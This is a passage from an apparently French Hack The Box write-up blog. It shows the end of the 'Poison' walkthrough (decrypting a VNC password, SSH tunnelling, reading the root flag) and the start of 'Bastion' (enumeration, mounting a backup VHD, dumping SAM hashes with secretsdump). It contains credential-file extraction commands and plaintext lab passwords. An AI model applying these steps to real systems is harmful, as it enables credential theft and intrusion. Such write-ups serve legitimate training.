<td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╚ Check weird <span class="p">&amp;</span> unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes </span></span><span class="line"><span class="cl">root <span class="m">1</span> 0.0 0.1 <span class="m">5408</span> <span class="m">1040</span> - SLs 22:56 0:00.00 /sbin/init -- </span></span><span class="line"><span class="cl">root <span class="m">319</span> 0.0 0.5 <span class="m">9560</span> <span class="m">5052</span> - Ss 22:56 0:00.09 /sbin/devd </span></span><span class="line"><span class="cl">root <span class="m">390</span> 0.0 0.2 <span class="m">10500</span> <span class="m">2452</span> - Ss 22:56 0:00.04 /usr/sbin/syslogd -s </span></span><span class="line"><span class="cl">root <span class="m">543</span> 0.0 0.5 <span class="m">56320</span> <span class="m">5396</span> - S 22:57 0:01.18 /usr/local/bin/vmtoolsd -c /usr/local/share/vmware-tools/tools.conf -p /usr/local/lib/open-vm-tools/plugins/vmsvc </span></span><span class="line"><span class="cl">root <span class="m">620</span> 0.0 0.7 <span class="m">57812</span> <span class="m">7052</span> - Is 22:57 0:00.01 /usr/sbin/sshd </span></span><span class="line"><span class="cl">root <span class="m">625</span> 0.0 1.1 <span class="m">99172</span> <span class="m">11516</span> - Ss 22:58 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT </span></span><span class="line"><span class="cl">root <span class="m">642</span> 0.0 0.6 <span class="m">20636</span> <span class="m">6140</span> - Ss 22:58 0:00.03 sendmail: accepting connections <span class="o">(</span>sendmail<span class="o">)</span> </span></span><span class="line"><span class="cl">root <span class="m">650</span> 0.0 0.2 <span class="m">12592</span> <span class="m">2436</span> - Ss 22:59 0:00.01 /usr/sbin/cron -s </span></span><span class="line"><span class="cl">root <span class="m">529</span> 0.0 0.9 <span class="m">23620</span> <span class="m">8872</span> v0- I 22:57 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth <span class="m">24</span> -rfbwait <span class="m">120000</span> -rfbauth /root/.vnc/passwd -rfbport <span class="m">5901</span> -localhost -nolisten tcp :1 </span></span><span class="line"><span class="cl">root <span class="m">540</span> 0.0 0.7 <span class="m">67220</span> <span class="m">7064</span> v0- I 22:57 0:00.01 xterm -geometry 80x24+10+10 -ls -title X Desktop </span></span><span class="line"><span class="cl">root <span class="m">541</span> 0.0 0.5 <span class="m">37620</span> <span class="m">5312</span> v0- I 22:57 0:00.00 twm </span></span><span class="line"><span class="cl">root <span class="m">697</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v0 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv0 </span></span><span class="line"><span class="cl">root <span class="m">698</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v1 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv1 </span></span><span class="line"><span class="cl">root <span class="m">699</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v2 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv2 </span></span><span class="line"><span class="cl">root <span class="m">700</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v3 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv3 </span></span><span class="line"><span class="cl">root <span class="m">701</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v4 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv4 </span></span><span class="line"><span class="cl">root <span class="m">702</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v5 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv5 </span></span><span class="line"><span class="cl">root <span class="m">703</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v6 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv6 </span></span><span class="line"><span class="cl">root <span class="m">704</span> 0.0 0.2 <span class="m">10484</span> <span class="m">2076</span> v7 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv7 </span></span><span class="line"><span class="cl">root <span class="m">617</span> 0.0 0.4 <span class="m">19660</span> <span class="m">3616</span> <span class="m">0</span> Is+ 22:57 0:00.00 -csh <span class="o">(</span>csh<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="dechiffrement-du-fichier-secret">Dechiffrement du fichier secret </h3><p>Finalement, on emet l&rsquo;hypothese que le fichier secret serait un fichier de mot de passe chiffré pour vnc. On tente d&rsquo;utiliser un outil github pour le déchiffré : <a class="link" href="https://github.com/jeroennijhof/vncpwd" target="_blank" rel="noopener" >https://github.com/jeroennijhof/vncpwd</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ git clone https://github.com/jeroennijhof/vncpwd.git </span></span><span class="line"><span class="cl">Cloning into <span class="s1">&#39;vncpwd&#39;</span>... </span></span><span class="line"><span class="cl">remote: Enumerating objects: 28, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Total <span class="m">28</span> <span class="o">(</span>delta 0<span class="o">)</span>, reused <span class="m">0</span> <span class="o">(</span>delta 0<span class="o">)</span>, pack-reused <span class="m">28</span> <span class="o">(</span>from 1<span class="o">)</span> </span></span><span class="line"><span class="cl">Receiving objects: 100% <span class="o">(</span>28/28<span class="o">)</span>, 22.15 KiB <span class="p">|</span> 1.85 MiB/s, <span class="k">done</span>. </span></span><span class="line"><span class="cl">Resolving deltas: 100% <span class="o">(</span>9/9<span class="o">)</span>, <span class="k">done</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">cd</span> vncpwd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ls </span></span><span class="line"><span class="cl">d3des.c d3des.h LICENSE Makefile README vncpwd.c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ make </span></span><span class="line"><span class="cl">gcc -Wall -g -o vncpwd vncpwd.c d3des.c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ./vncpwd ../secret </span></span><span class="line"><span class="cl">Password: VNCP@<span class="nv">$$</span>! </span></span></code></pre></td></tr></table> </div> </div><p>On obtient le mot de passe: <code>VNCP@$$!</code></p> <h3 id="connexion-sur-la-session-vnc---root-flag">Connexion sur la session VNC - root flag </h3><p>On peut se connecter a une session VNC facilement en utilisant l&rsquo;outil <code>vncviewer</code>. Mais le port 5901 n&rsquo;est dispo qu&rsquo;en local sur la machine ! Je propose de résoudre ce probleme en faisant du port forwarding sur ma machine, à l&rsquo;aide l&rsquo;option -L de ssh.</p> <p>Ensuite j&rsquo;ai pu utiliser vncviewer et ouvrir la session avec le mot de passe obtenu</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh charix@10.10.10.84 -L 5901:localhost:5901 </span></span><span class="line"><span class="cl">Charix!2#4%6<span class="p">&amp;</span>8<span class="o">(</span><span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>charix@10.10.10.84<span class="o">)</span> Password <span class="k">for</span> charix@Poison: </span></span><span class="line"><span class="cl">Last login: Tue Mar <span class="m">4</span> 23:11:10 <span class="m">2025</span> from 10.10.14.19 </span></span><span class="line"><span class="cl">FreeBSD 11.1-RELEASE <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c1">#0 r321309: Fri Jul 21 02:08:28 UTC 2017</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Welcome to FreeBSD! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap localhost -p <span class="m">5901</span> </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-03-04 17:35 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> localhost <span class="o">(</span>127.0.0.1<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.000067s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Other addresses <span class="k">for</span> localhost <span class="o">(</span>not scanned<span class="o">)</span>: ::1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">5901/tcp open vnc-1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 0.13 seconds </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vncviewer localhost </span></span><span class="line"><span class="cl">vncviewer: ConnectToTcpAddr: connect: Connection refused </span></span><span class="line"><span class="cl">Unable to connect to VNC server </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison/vncpwd<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vncviewer localhost:5901 </span></span><span class="line"><span class="cl">Connected to RFB server, using protocol version 3.8 </span></span><span class="line"><span class="cl">Enabling TightVNC protocol extensions </span></span><span class="line"><span class="cl">Performing standard VNC authentication </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">Authentication successful </span></span><span class="line"><span class="cl">Desktop name <span class="s2">&#34;root&#39;s X desktop (Poison:1)&#34;</span> </span></span><span class="line"><span class="cl">VNC server default format: </span></span><span class="line"><span class="cl"> <span class="m">32</span> bits per pixel. </span></span><span class="line"><span class="cl"> Least significant byte first in each pixel. </span></span><span class="line"><span class="cl"> True colour: max red <span class="m">255</span> green <span class="m">255</span> blue 255, <span class="nb">shift</span> red <span class="m">16</span> green <span class="m">8</span> blue <span class="m">0</span> </span></span><span class="line"><span class="cl">Using default colormap which is TrueColor. Pixel format: </span></span><span class="line"><span class="cl"> <span class="m">32</span> bits per pixel. </span></span><span class="line"><span class="cl"> Least significant byte first in each pixel. </span></span><span class="line"><span class="cl"> True colour: max red <span class="m">255</span> green <span class="m">255</span> blue 255, <span class="nb">shift</span> red <span class="m">16</span> green <span class="m">8</span> blue <span class="m">0</span> </span></span><span class="line"><span class="cl">Same machine: preferring raw encoding </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------- VNCVIEWER ------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root@Poison:~ <span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@Poison:~ <span class="c1"># cat root.txt</span> </span></span><span class="line"><span class="cl">716d.....61f5 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/bastion-htb/Mon, 03 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/bastion-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Bastion cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Bastion</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.134</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">L4mpje : bureaulampje </span></span><span class="line"><span class="cl">Administrator : thXLHM96BeKL0ER2 </span></span><span class="line"><span class="cl">Peter : 3RTTT5zNt2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.134 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">127</span> OpenSSH for_Windows_7.9 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3 </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds syn-ack ttl <span class="m">127</span> Windows Server <span class="m">2016</span> Standard <span class="m">14393</span> microsoft-ds </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">47001/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl">49664/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49665/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49666/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49668/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49669/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49670/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2025-02-27T22:08:39 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: 2025-02-27T22:04:13 </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled but not required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb-os-discovery: </span></span><span class="line"><span class="cl"><span class="p">|</span> OS: Windows Server <span class="m">2016</span> Standard <span class="m">14393</span> <span class="o">(</span>Windows Server <span class="m">2016</span> Standard 6.3<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Computer name: Bastion </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS computer name: BASTION<span class="se">\x</span><span class="m">00</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Workgroup: WORKGROUP<span class="se">\x</span><span class="m">00</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ System time: 2025-02-27T23:08:38+01:00 </span></span><span class="line"><span class="cl"><span class="p">|</span> smb-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> account_used: guest </span></span><span class="line"><span class="cl"><span class="p">|</span> authentication_level: user </span></span><span class="line"><span class="cl"><span class="p">|</span> challenge_response: supported </span></span><span class="line"><span class="cl"><span class="p">|</span>_ message_signing: disabled <span class="o">(</span>dangerous, but default<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: mean: -19m59s, deviation: 34m38s, median: 0s </span></span><span class="line"><span class="cl"><span class="p">|</span> p2p-conficker: </span></span><span class="line"><span class="cl"><span class="p">|</span> Checking <span class="k">for</span> Conficker.C or higher... </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">1</span> <span class="o">(</span>port 26941/tcp<span class="o">)</span>: CLEAN <span class="o">(</span>Couldn<span class="s1">&#39;t connect) </span></span></span><span class="line"><span class="cl"><span class="s1">| Check 2 (port 51775/tcp): CLEAN (Couldn&#39;</span>t connect<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">3</span> <span class="o">(</span>port 18741/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Failed to receive data<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Check <span class="m">4</span> <span class="o">(</span>port 15523/udp<span class="o">)</span>: CLEAN <span class="o">(</span>Timeout<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 0/4 checks are positive: Host is CLEAN or ports are blocked </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb-backups-share">SMB &ldquo;backups&rdquo; share </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ smbclient --no-pass -L //10.10.10.134 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> Backups Disk </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.10.134 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span></code></pre></td></tr></table> </div> </div><h3 id="mount-backup-windows-disk-vdb">Mount backup windows disk VDB </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">guestmount -a ./9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/vhd_mount </span></span></code></pre></td></tr></table> </div> </div><h3 id="retrieve-hashes-from-windows-files">Retrieve hashes from Windows files </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>root㉿kali<span class="o">)</span>-<span class="o">[</span>/home/kali/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─# cp /mnt/vhd_mount/Windows/System32/config/SAM . </span></span><span class="line"><span class="cl">cp /mnt/vhd_mount/Windows/System32/config/SYSTEM . </span></span><span class="line"><span class="cl">cp /mnt/vhd_mount/Windows/System32/config/SECURITY . </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>root㉿kali<span class="o">)</span>-<span class="o">[</span>/home/kali/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─# ls </span></span><span class="line"><span class="cl">SAM SECURITY SYSTEM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>root㉿kali<span class="o">)</span>-<span class="o">[</span>/home/kali/htb/Bastion<span class="o">]</span> </span></span><span class="line"><span class="cl">└─# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping <span class="nb">local</span> SAM hashes <span class="o">(</span>uid:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping cached domain logon information <span class="o">(</span>domain/username:hash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span 